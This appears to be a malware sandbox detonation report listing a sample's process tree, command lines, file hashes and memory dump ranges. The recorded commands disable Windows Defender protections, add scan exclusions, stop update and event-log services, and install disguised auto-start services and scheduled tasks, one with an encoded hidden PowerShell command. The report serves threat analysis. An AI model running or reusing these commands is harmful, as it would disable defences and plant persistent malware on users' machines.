C:\Windows\SysWOW64\cmd.exe
/C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
\??\c:\windows\SysWOW64\schtasks.exe
schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
C:\Windows\SysWOW64\cmd.exe
/C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
\??\c:\windows\SysWOW64\schtasks.exe
schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
C:\Windows\system32\taskeng.exe
taskeng.exe {A0C7BAAC-E03D-419F-BDCD-85EABDCF3FBD} S-1-5-18:NT AUTHORITY\System:Service:
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\C1BA.bat" "
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\RYxniJw.exe
C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\RYxniJw.exe it /PdldidFsHw 385118 /S
C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240514010344.log C:\Windows\Logs\CBS\CbsPersist_20240514010344.cab
C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\RYxniJw.exe
C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\RYxniJw.exe it /PdldidFsHw 385118 /S
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Users\Admin\Pictures\Mk1r2YAqwQVUv14MNBRTpeNB.exe
"C:\Users\Admin\Pictures\Mk1r2YAqwQVUv14MNBRTpeNB.exe"
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'taskmgr.exe'
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Users\Admin\Pictures\R3korVHT4WNZUjkc4bHNZ2rr.exe
"C:\Users\Admin\Pictures\R3korVHT4WNZUjkc4bHNZ2rr.exe"
C:\Users\Admin\Pictures\gSyoK3N9HzpEDXDVRb23pzgh.exe
"C:\Users\Admin\Pictures\gSyoK3N9HzpEDXDVRb23pzgh.exe"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
C:\ProgramData\Google\Chrome\updater.exe
C:\ProgramData\Google\Chrome\updater.exe
C:\Users\Admin\Pictures\aFeO3W4FMAYpzXDCQxnEUJVc.exe
"C:\Users\Admin\Pictures\aFeO3W4FMAYpzXDCQxnEUJVc.exe"
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "WSNKISKT"
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "WSNKISKT" binpath= "C:\ProgramData\wikombernizc\reakuqnanrkn.exe" start= "auto"
C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe
"C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "taskmgr" /tr "C:\ProgramData\taskmgr.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gBaxREWWY" /SC once /ST 00:14:48 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gBaxREWWY"
C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "WSNKISKT"
C:\ProgramData\wikombernizc\reakuqnanrkn.exe
C:\ProgramData\wikombernizc\reakuqnanrkn.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gBaxREWWY"
Network
Files
| SHA512 | 53449df9f1f971a13c427c3c7e31fc3315ca2d1a23124fe42ca11d53ebdfa46d49972ae8b43987f44c06c3d4fbc434bc6fefb2976ec42376d08196bfd26143e0 |
C:\Users\Admin\Pictures\R3korVHT4WNZUjkc4bHNZ2rr.exe
| MD5 | 6a5836434f915a2de723a1b2ddc29a66 |
| SHA1 | a643e23618895ea03f86d4f41379933cd99dc8b1 |
| SHA256 | 95ffbdc57165bcd4e41b3390f5b8094b7243b3fb95f9b989e72a98c8a9616584 |
| SHA512 | 65d6c70098646ac1dca54c986b9a4886ccf9977d053aa9746f107d3258893321c00e30c630c60a8285ed1c93c46beae8d55fa89a3362f8515e5358ac78c3be5f |
memory/2388-568-0x0000000004430000-0x0000000004828000-memory.dmp
C:\Users\Admin\Pictures\gSyoK3N9HzpEDXDVRb23pzgh.exe
| MD5 | d3dee883e0288772cdaaccef38fec68d |
| SHA1 | ed12b66117d6f0993725e7ce71c6461af2eba18c |
| SHA256 | f338d4cafffabb5a2d09561761c6475750444481c6e07dab40f50197a7e110b5 |
| SHA512 | 37c18be628f898ea772897e7656b9286b01a4dcea5173abfe3adfdc3b3b1fe83eac137676ddf47a43fa289147e62ed987b2364a0ec27041fdfea2e83826687b4 |
C:\Users\Admin\Pictures\RxGmeplSAOH7kpj64hcY0qDA.exe
| MD5 | a820588766207bdd82ac79ff4f553b6f |
| SHA1 | 2e3985344dddfc9c88d5f5a22bdfa932259332d3 |
| SHA256 | 0209678b3cb7b5d67d9a73fbdce851148909ecdba3b8766d5a59eca4cb848e05 |
| SHA512 | cc052c5021ec0f18e3b24701bdf9425ffdee67645eadab5f27f8dd073eb4711a824e77c83b39cb2d2a0de44733bd09504aba466120393bb63001c8d80aa76656 |
memory/1792-581-0x00000000044C0000-0x00000000048B8000-memory.dmp
memory/1680-585-0x00000000043D0000-0x00000000047C8000-memory.dmp
memory/1184-586-0x000000000C920000-0x000000000D375000-memory.dmp
memory/1624-601-0x0000000140000000-0x0000000140A55000-memory.dmp
memory/1848-609-0x00000000043F0000-0x00000000047E8000-memory.dmp
memory/2296-608-0x0000000000400000-0x0000000000793000-memory.dmp
C:\Windows\System32\GroupPolicy\gpt.ini
| MD5 | 8ef9853d1881c5fe4d681bfb31282a01 |
| SHA1 | a05609065520e4b4e553784c566430ad9736f19f |
| SHA256 | 9228f13d82c3dc96b957769f6081e5bac53cffca4ffde0ba1e102d9968f184a2 |
| SHA512 | 5ddee931a08cfea5bb9d1c36355d47155a24d617c2a11d08364ffc54e593064011dee4fea8ac5b67029cab515d3071f0ba0422bb76af492a3115272ba8feb005 |
memory/2296-621-0x0000000000400000-0x0000000000793000-memory.dmp
memory/1176-620-0x0000000002EA0000-0x0000000002EB6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe
| MD5 | 1157922d694e53092c8c05331878f8a1 |
| SHA1 | f63cbc1b6e261bd011352c0f64ec6238ec37c397 |
| SHA256 | 2546c196a3636ae61a971fd718a9feff3dd2b137ab96fc5f256f111b165cbf62 |
| SHA512 | 35d95d7672a2f3f1796317d3b455bc6575e997ce67c049a4ccc0971a8066820df1f0e069b9a1e07e615cf87685fdd0518859d4769f132f02fe38dfe534118ed1 |
C:\Users\Admin\AppData\Local\Temp\1000257001\FirstZ.exe
| MD5 | ffada57f998ed6a72b6ba2f072d2690a |
| SHA1 | 6857b5f0c40a1cdb0411eb34aa9fe5029bcdb84f |
| SHA256 | 677f393462e24fb6dba1a47b39e674f485450f91deee6076ccbad9fd5e05bd12 |
| SHA512 | 1de77f83a89935bb3fc3772d5190c3827d76a998785d451e2c0d11a0061cfd28f1b96eccb41b012c76ddda2021e3333a0a647489ae3c6dac10cfb8302abdf33f |
memory/796-647-0x0000000004560000-0x0000000004958000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\[email protected]\setup.ini
| MD5 | a483da8b27289fc9cc49d6b17e61cbf6 |
| SHA1 | 2d4a5a704c2ff332df6436b7bcd16365f03c2a97 |
| SHA256 | f7785d4e80691cb2bb59301fe8962e50862c44d8992a0e308f86689b7ee76911 |
| SHA512 | e0d061a5ed7c7789d11331b192c0693e9a49398de371153d1d13a8b7a32ae7078ea103b03a535ebd0581f1d9d56bacf77b9e31f68ab1888663111e8d2afea0a9 |
C:\Users\Admin\AppData\Local\Temp\[email protected]
| MD5 | 5cdfc4b9de66db60219b702987b6884f |
| SHA1 | 3f664159cd6af48abc3f4c4a2d0ec16ff715b208 |
| SHA256 | 9a52a5e9dcfcc59699cab7a8777c114d2b9685e68b00502c0bfb28b42ef3321d |
| SHA512 | 3c14da8a340736a697b4b2188b1b250b7328278a11e3483cc684247a2c10fc2b69435013e2704275dae319d992a048ff66a074065e91e9a2f65cfbd24a874d1d |
memory/2560-691-0x0000000001040000-0x0000000001511000-memory.dmp
C:\Users\Admin\Pictures\tX8T2gJKxzDcDwjjjrjNMPV9.exe
| MD5 | 5cc472dcd66120aed74de36341bfd75a |
| SHA1 | 1dfc4d42da90fe070d4474ddd7fa7b6f6ffa97ab |
| SHA256 | 958dd14c90b1c73852f926608f212377aa3a36666c04024f97c20deb375e9773 |
| SHA512 | b5cf358d95ec9a6cca81d2e9c23f0ede93ab94963bb5c626f4e6233a06cedae63b73dd81d2455acb29b003c3b4e2f54da6010daebc4639a3dcc54314d4fe4f81 |
memory/2388-706-0x0000000000400000-0x0000000002B0C000-memory.dmp
memory/1624-712-0x0000000140000000-0x0000000140A55000-memory.dmp
C:\Users\Admin\Pictures\7WRtealACcE9KDLVlx7PIPxc.exe
| MD5 | 3d233051324a244029b80824692b2ad4 |
| SHA1 | a053ebdacbd5db447c35df6c4c1686920593ef96 |
| SHA256 | fbd467ce72bca00eea3aaa6f32abc8aca1a734030d082458e21e1fe91e6a8d84 |
| SHA512 | 7f19c6400ac46556a9441844242b1acb0b2f11a47f5d51f6d092406a8c759a6d78c578bb5b15035e7cd1cdb3035acf0db884708b0da1a83eb652a50a68e3a949 |
memory/1680-707-0x0000000000400000-0x0000000002B0C000-memory.dmp
memory/1792-708-0x0000000000400000-0x0000000002B0C000-memory.dmp
memory/1848-717-0x0000000000400000-0x0000000002B0C000-memory.dmp
memory/1616-722-0x0000000002050000-0x00000000026BE000-memory.dmp
memory/1640-723-0x0000000001080000-0x00000000016EE000-memory.dmp
memory/1640-724-0x00000000008D0000-0x0000000000F3E000-memory.dmp
memory/1640-725-0x00000000008D0000-0x0000000000F3E000-memory.dmp
memory/1640-726-0x00000000008D0000-0x0000000000F3E000-memory.dmp
memory/2560-727-0x0000000005FB0000-0x00000000062F9000-memory.dmp
memory/1124-728-0x000000001B3D0000-0x000000001B6B2000-memory.dmp
memory/1124-729-0x00000000025E0000-0x00000000025E8000-memory.dmp
memory/2560-744-0x0000000001040000-0x0000000001511000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS3830.tmp\Install.exe
| MD5 | 220a02a940078153b4063f42f206087b |
| SHA1 | 02fc647d857573a253a1ab796d162244eb179315 |
| SHA256 | 7eb93d93b03447a6bafd7e084305d41bf9780bd415cb2e70020952d06f3d7b60 |
| SHA512 | 42ac563a7c28cbf361bfb150d5469f0278ab87ce445b437eef8425fb779689d70230b550815f30f9db2909c1ba0dd015b172dfe3e718d26706856f4cb0eeeeaa |
memory/3392-749-0x00000000014F0000-0x0000000001B5E000-memory.dmp
memory/3392-748-0x00000000014F0000-0x0000000001B5E000-memory.dmp
memory/3392-747-0x0000000000E80000-0x00000000014EE000-memory.dmp
memory/3296-746-0x0000000002020000-0x000000000268E000-memory.dmp
memory/796-745-0x0000000000400000-0x0000000002B0C000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3PUVF7852WPQGXNAWL0E.temp
| MD5 | 2750af5e157c729938337db26e51f5ce |
| SHA1 | b6c9fc89e39b80647309a842c03b8298fd00a391 |
| SHA256 | 424181b1af0739ba1646473c09e9bdd204918caee81fd20b6123ae202ab7e640 |
| SHA512 | 11567f609a821183e4f8169a79f7ec04ab8518d502342902eb8e83d76b89a2fcddb58489e278bfc2f69ee15ae8e564ff16dae0972f8f368cccf706ca460fa759 |
memory/2388-752-0x0000000000400000-0x0000000002B0C000-memory.dmp
memory/1680-753-0x0000000000400000-0x0000000002B0C000-memory.dmp
memory/1792-754-0x0000000000400000-0x0000000002B0C000-memory.dmp
memory/1640-756-0x0000000010000000-0x00000000105DD000-memory.dmp
memory/1848-759-0x0000000000400000-0x0000000002B0C000-memory.dmp
memory/3392-764-0x0000000010000000-0x00000000105DD000-memory.dmp
memory/2560-767-0x0000000001040000-0x0000000001511000-memory.dmp
memory/1184-769-0x000000000C920000-0x000000000D375000-memory.dmp
memory/796-768-0x0000000000400000-0x0000000002B0C000-memory.dmp
memory/3776-779-0x000000001B300000-0x000000001B5E2000-memory.dmp
memory/3776-780-0x0000000002370000-0x0000000002378000-memory.dmp
memory/2388-785-0x0000000000400000-0x0000000002B0C000-memory.dmp
memory/1680-787-0x0000000000400000-0x0000000002B0C000-memory.dmp
memory/1792-788-0x0000000000400000-0x0000000002B0C000-memory.dmp
memory/1848-790-0x0000000000400000-0x0000000002B0C000-memory.dmp
memory/2560-792-0x0000000001040000-0x0000000001511000-memory.dmp
memory/796-793-0x0000000000400000-0x0000000002B0C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\9C20.bat
| MD5 | 55cc761bf3429324e5a0095cab002113 |
| SHA1 | 2cc1ef4542a4e92d4158ab3978425d517fafd16d |
| SHA256 | d6cceb3c71b80403364bf142f2fa4624ee0be36a49bac25ed45a497cf1ce9c3a |
| SHA512 | 33f9f5cad22d291077787c7df510806e4ac31f453d288712595af6debe579fabed6cdf4662e46e6fa94de135b161e739f55cfae05c36c87af85ed6a6ad1c9155 |
memory/2388-805-0x0000000000400000-0x0000000002B0C000-memory.dmp
memory/1680-806-0x0000000000400000-0x0000000002B0C000-memory.dmp
memory/2560-815-0x0000000001040000-0x0000000001511000-memory.dmp
memory/2948-820-0x0000000001DF0000-0x0000000001DF8000-memory.dmp
memory/1616-822-0x0000000002050000-0x00000000026BE000-memory.dmp
memory/1640-823-0x0000000001080000-0x00000000016EE000-memory.dmp
memory/1640-829-0x00000000008D0000-0x0000000000F3E000-memory.dmp
memory/1640-828-0x00000000008D0000-0x0000000000F3E000-memory.dmp
memory/1640-830-0x00000000008D0000-0x0000000000F3E000-memory.dmp
memory/796-821-0x0000000000400000-0x0000000002B0C000-memory.dmp
memory/2388-831-0x0000000000400000-0x0000000002B0C000-memory.dmp
memory/2560-847-0x0000000001040000-0x0000000001511000-memory.dmp
memory/1848-846-0x0000000000400000-0x0000000002B0C000-memory.dmp
memory/1680-843-0x0000000000400000-0x0000000002B0C000-memory.dmp
memory/3296-849-0x0000000002020000-0x000000000268E000-memory.dmp
memory/1792-844-0x0000000000400000-0x0000000002B0C000-memory.dmp
memory/3392-852-0x00000000014F0000-0x0000000001B5E000-memory.dmp
memory/3392-851-0x00000000014F0000-0x0000000001B5E000-memory.dmp
memory/3392-850-0x0000000000E80000-0x00000000014EE000-memory.dmp
memory/796-848-0x0000000000400000-0x0000000002B0C000-memory.dmp
memory/1848-853-0x0000000000400000-0x0000000002B0C000-memory.dmp
memory/3540-866-0x000000001B3A0000-0x000000001B682000-memory.dmp
memory/3540-867-0x0000000002410000-0x0000000002418000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
